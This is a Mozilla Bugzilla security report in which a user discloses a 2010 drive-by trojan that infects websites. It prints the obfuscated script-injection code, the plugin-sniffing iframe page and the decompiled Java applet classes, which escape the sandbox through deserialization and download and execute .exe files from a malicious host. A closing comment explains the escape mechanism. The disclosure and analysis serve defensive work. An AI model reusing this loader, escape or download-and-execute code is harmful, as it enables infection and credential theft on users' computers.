Bug 541949
Opened 14 years ago
Closed 3 years ago
trojan.downloader.js.agent.ewo
(Firefox :: Security, defect)
RESOLVED
WORKSFORME
(Reporter: migabriel.84, Unassigned)
(Blocks 1 open bug)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) We have had problems with a trojan that is wondering freely on the internet since January 8yh and its actions are not yet completely restricted. Some websites are infected with a JavaScript code that inserts a dynamic iframe wich contains another iframe. The latter loads a Java applet. This one runs an executable file that somehow accesses the FTP passwords saved in FileZilla and perhaps other FTP clients, connects to them and posts the attached javascript code in every index and javascript file. Please analize the attached malware code that i have managed to obtain using Firebug addon on a Fedora 12 distribution. The script that can be found in the web pag. /*Exception*/ document.write('<script src='+'h)&t&!#t^p!$:))&/^$/()&##k&!!#e&@e!p#$(!v#i()d)#-!c@#)(o)@m@.)m^y(^w)^(e#&#$b#&)!s#^!#e#()#a(r!c(h!@@.)#(c$o$)m@#&#.#&$!e)@$&m#&p&@f$($l)i$^#x^^)-$()c)o)m(!&.&^(^t($r&#$u))e@^$#l$^$^i)($f^(!e)^f^!#a&^m!^&i$^l#&&@y^#@#&.!#r@#u)@^:$(8!))$0$$#8#!0!$)/(#!(n#@$!&o@^(&@v^i@n$k!y&(.$!!!@c!!@z$$&(/##$(!n$@!o(^#!&v@$!i$&(n$@@k@(y^^.(@c^$z(#/(&^((g)@&o^o$!$$g)l!e#(.)c#&$o)&^$@m@^/(z@e#d!&@#g^^e^!^.@^#@n^$e)^t$&^/^)g@o@@^o^$@@g)$l###e#@.$#c^)o$m@)@.)(p$^&e!/$$!($'.replace(/\!|\(|#|@|\^|\$|&|\)/ig, '')+' defer=defer></scr'+'ipt>'); Firs IFrame <iframe src="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/index.php?ys" /> <html> <head> <title>Mxn4rzu36txmtkji6fk9h5roho</title> </head> <body> <script> function Zock8gn(){ try{ Wub7r6cz = '<^&($i&@)f$#r)$!&a^(m(&(e! 
&(s^r&&#&c@@=#!p(^i$!&c^($s)!(/!($)C$(&!h)@&a((n!g^(&e!$L$@^o)((g(!$!.#!&p!&$d$#f$$>!)<&$@)/&$#i)f^r!(&!!a&!(m$^e@#^>#'.replace(/\$|\^|#|\!|@|\)|&|\(/ig, ''); H9102kw5 = '<^))i^&f!(!r$@#a^)m@!)e(^@ $s!#r^@^@c@@(=^&p$!i#c$(@s#/$j^a$)&v(a@.!h())t@$&m#@l$#)>((<@^/)!!$i)@$f#&r()a&@m&#@e)^&>^$!'.replace(/#|\)|@|\!|\$|&|\(|\^/ig, ''); L9z2gkl5f = 'A&(d&)o)&)^b^^e@@(@ !(A&^^c^)r(@$^!o(^(b!&a)$#^(t$'.replace(/@|#|&|\$|\(|\)|\^|\!/ig, ''); Igp2ybkx = 'A$$d$o&!)^&b($&e^&& ^P#D@&^F&#!)'.replace(/\)|\^|@|\(|\!|\$|&|#/ig, ''); for(i = 0; i < navigator.plugins.length; i++){ Htj2r5y = navigator.plugins[i].name; if((Htj2r5y.indexOf(L9z2gkl5f) != -1) || (Htj2r5y.indexOf(Igp2ybkx) != -1)){ document.write(Wub7r6cz); } } }catch(If9yxc2d){} try{ if (navigator.javaEnabled() ){ document.write(H9102kw5); } }catch(If9yxc2d){} } 25Zock8gn(); </script> </body> </html> Second IFrame <iframe src="pics/java.html" /> <html> <head> <title>Mxn4rzu36txmtkji6fk9h5roho</title> </head> <body> <applet width="300" height="300" archive="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/pics/JavaGame.jar" code="myf.y.AppletX" /> </body> </html> The jar file AppletX.java // Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov Date: 1/20/2010 5:05:33 PM // Home Page: http://members.fortunecity.com/neshkov/dj.html http://www.neshkov.com/dj.html - Check often for new version! 
// Decompiler options: packimports(3) package myf.y; import java.applet.Applet; import java.io.ByteArrayInputStream; import java.io.ObjectInputStream; // Referenced classes of package myf.y: // PayloadX, LoaderX public class AppletX extends Applet { public AppletX() { } public void init() { try { ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes(serializedObject))); Object obj = objectinputstream.readObject(); if(obj != null && LoaderX.instance != null) { String s = "Xeoi2a"; String s1 = getParameter("data"); String s2 = "1"; if(s1 == null) s1 = ""; LoaderX.instance.bootstrapPayload(s1, s2); } } catch(Exception exception) { } } private static final long serialVersionUID = 0xd30f41af207ff1c8L; private static final String serializedObject = "ACEDggg57372gg1B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5BgDgC1g2ggg14Agg1g677265676F7269616E4375746F7665727872gg126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8Eg3gggB5AgggC6172654669656C647353657449gggE66697273744461794F665765656B5Aggg9697354696D655365745Aggg76C656E69656E7449gg166D696E696D616C44617973496E46697273745765656B49ggg96E6578745374616D7g49gg1573657269616C56657273696F6E4F6E53747265616D4Aggg474696D655Bggg66669656C647374ggg25B495Bggg5697353657474ggg25B5A4Cggg47A6F6E6574gg144C6A6176612F7574696C2F54696D655A6F6E653B787gg1ggggggg1g1g1ggggggg1ggggggg2ggggggg1ggggg121563AFCgE7572ggg25B494DBA6g2676EAB2A5g2gggg787ggggggg11ggggggg1ggggg7D9ggggggg4gggggg15ggggggg4gggggg12gggggg8Aggggggg2ggggggg3ggggggg1ggggggg4gggggg1ggggggg11gggggg22ggggg2DEFE488Cgggggggggg7572ggg25B5A578F2g3914B85DE2g2gggg787ggggggg11g1g1g1g1g1g1g1g1g1g1g1g1g1g1g1g1g17372gg186A6176612E7574696C2E53696D7g6C6554696D655A6F6E65FA675D6gD15EF5A6g3gg1249gggA647374536176696E677349ggg6656E6444617949gggC656E644461794F665765656B49ggg7656E644D6F646549ggg8656E644D6F6E746849ggg7656E6454696D6549gggB656E6454696D654D6F646549ggg97261774F666673657449gg1573657269616C56657273696F6E4F6E53747265616D49gg
g8737461727444617949gggE73746172744461794F665765656B49ggg973746172744D6F646549gggA73746172744D6F6E746849ggg9737461727454696D6549gggD737461727454696D654D6F646549ggg97374617274596561725AgggB7573654461796C696768745BgggB6D6F6E74684C656E67746874ggg25B427872gg126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA1g2ggg14Cggg2494474gg124C6A6176612F6C616E672F537472696E673B787g74gggE416D65726963612F446177736F6Egg36EE8gggggggggggggggggggggggggggggggggggggggggggggggggFE488Cggggggggg2gggggggggggggggggggggggggggggggggggggggggggggggggggggggggg7572ggg25B42ACF317F8g6g854Egg2gggg787ggggggggC1F1C1F1E1F1E1F1F1E1F1E1F77gAggggggg6gggggggggggg7571gg7Eggg6ggggggg2gggggggggggggggg787372gggD6D79662E792E4C6F61646572585E8B4C67DDC4g9D8g2gggg787g78FFFFF4E2F964ACgggA".replace('g', '0'); public static String data = null; } LoaderX.java // Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov Date: 1/20/2010 5:06:33 PM // Home Page: http://members.fortunecity.com/neshkov/dj.html http://www.neshkov.com/dj.html - Check often for new version! 
// Decompiler options: packimports(3) package myf.y; import java.io.*; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class LoaderX extends ClassLoader implements Serializable { public LoaderX() { } private void writeObject(ObjectOutputStream objectoutputstream) throws IOException, ClassNotFoundException { objectoutputstream.defaultWriteObject(); } private void readObject(ObjectInputStream objectinputstream) throws IOException, ClassNotFoundException { instance = this; objectinputstream.defaultReadObject(); } public void bootstrapPayload(String s, String s1) throws IOException { Object obj = null; try { ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(); byte abyte0[] = new byte[8192]; InputStream inputstream = getClass().getResourceAsStream("/myf/y/PayloadX.class"); int i; while((i = inputstream.read(abyte0)) > 0) bytearrayoutputstream.write(abyte0, 0, i); abyte0 = bytearrayoutputstream.toByteArray(); URL url = new URL("file:///"); Certificate acertificate[] = new Certificate[0]; Permissions permissions = new Permissions(); permissions.add(new AllPermission()); ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions); Class class1 = defineClass("myf.y.PayloadX", abyte0, 0, abyte0.length, protectiondomain); if(class1 != null) { Field field = class1.getField("data"); Field field1 = class1.getField("cc"); Object obj1 = class1.newInstance(); field.set(obj1, s); field1.set(obj1, s1); obj1 = class1.newInstance(); } } catch(Exception exception) { } } private static final long serialVersionUID = 0x5e8b4c67ddc409d8L; public static LoaderX instance = null; } PayloadX.java // Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov Date: 1/20/2010 5:07:09 PM // Home Page: http://members.fortunecity.com/neshkov/dj.html http://www.neshkov.com/dj.html - Check often for new version! 
// Decompiler options: packimports(3) package myf.y; import java.io.*; import java.net.URL; import java.security.AccessController; import java.security.PrivilegedExceptionAction; public class PayloadX implements PrivilegedExceptionAction { public static byte[] StringToBytes(String s) { byte abyte0[] = new byte[s.length() / 2]; for(int i = 0; i < s.length(); i += 2) abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); return abyte0; } public Object run() throws Exception { if(data == null) return null; try { String s = System.getProperty("os.name"); if(s.indexOf("Windows") >= 0) { int i = 1; if(cc != null) i = Integer.parseInt(cc); for(int j = 0; j < i; j++) { URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString()); url.openConnection(); InputStream inputstream = url.openStream(); String s1 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString(); FileOutputStream fileoutputstream = new FileOutputStream(s1); int k; int l; for(k = 0; (l = inputstream.read()) != -1; k++) fileoutputstream.write(l); inputstream.close(); fileoutputstream.close(); if(k >= 1024) Runtime.getRuntime().exec(s1); } } } catch(Exception exception) { } return null; } public PayloadX() { try { AccessController.doPrivileged(this); } catch(Exception exception) { } } public static String data = null; public static String cc = null; } Reproducible: Always
Updated•14 years ago
Summary: tojan.downloader.js.agent.ewo → trojan.downloader.js.agent.ewo
Updated•14 years ago
Blocks: malware-attacks
Updated•14 years ago
Group: core-security
Updated•13 years ago
Version: unspecified → 3.6 Branch
Comment 1•12 years ago
What should we do with this report? There is nothing we can do with it from the Firefox side: the attached sample does not exploit the browser itself, it loads a Java applet and the sandbox escape happens inside the Java plugin.
Comment 2•3 years ago
Hey Matti,
Are you by any chance able to reproduce this issue or should we close it?
Flags: needinfo?(bugzilla)
Comment 3•3 years ago
I don't think this report is still useful after all these years.
The LoaderX.java part also no longer works, since Mozilla stopped supporting the Java browser plugin. (For the record, that class is what escaped the applet sandbox: AppletX deserializes an attacker-supplied object, LoaderX is a serializable ClassLoader whose readObject() captures itself in a static field, bootstrapPayload() then re-defines PayloadX under a ProtectionDomain granting AllPermission, and PayloadX runs under doPrivileged, downloading the URLs given in the applet's "data" parameter to a random .exe in java.io.tmpdir and executing it on Windows. Mitigation at the time was a patched/disabled Java plugin, not a Firefox change.)
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Flags: needinfo?(bugzilla)
Resolution: --- → WORKSFORME